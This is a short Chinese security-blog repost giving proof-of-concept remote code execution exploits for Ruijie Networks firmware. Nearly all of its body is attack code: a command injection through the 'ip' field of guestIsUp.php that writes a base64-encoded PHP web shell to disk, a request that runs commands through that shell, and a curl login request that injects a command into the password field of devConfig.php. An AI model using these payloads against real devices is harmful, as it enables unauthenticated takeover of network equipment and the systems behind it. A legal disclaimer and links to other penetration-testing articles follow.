Ruijie Networks RCE

2022年7月22日13:26:03评论141 views字数 436阅读1分27秒阅读模式

Ruijie Networks RCE

echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d POC: POST /guest_auth/guestIsUp.php ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 GET /guest_auth/poc.php?cmd=whoami

Ruijie Networks RCE

Another unauthorized RCE in same firmware PoC: curl http://host/openApi/devConfig.php?a=login -X POST -d "{"admin":"admin","encry":true,"password":"1'; COMMAND ;echo 'a"}"

Ruijie Networks RCE

本文始发于微信公众号（Khan安全攻防实验室）：Ruijie Networks RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Ruijie Networks RCE

一次不出网的渗透测试

攻防第一天，内网又穿了？

分享常见的逻辑漏洞挖掘方法(第一部分)

【SQLmap 下】记一次奇妙的Oracle注入绕WAF之旅

前端绕过的攻与防（中）

应急响应案例分析与经验分享

漏洞扫描原理和工具

如何绕过签名校验

Spring Actuator 暴露在攻防中的利用

关于一次dify的渗透

发表评论

在线咨询

微信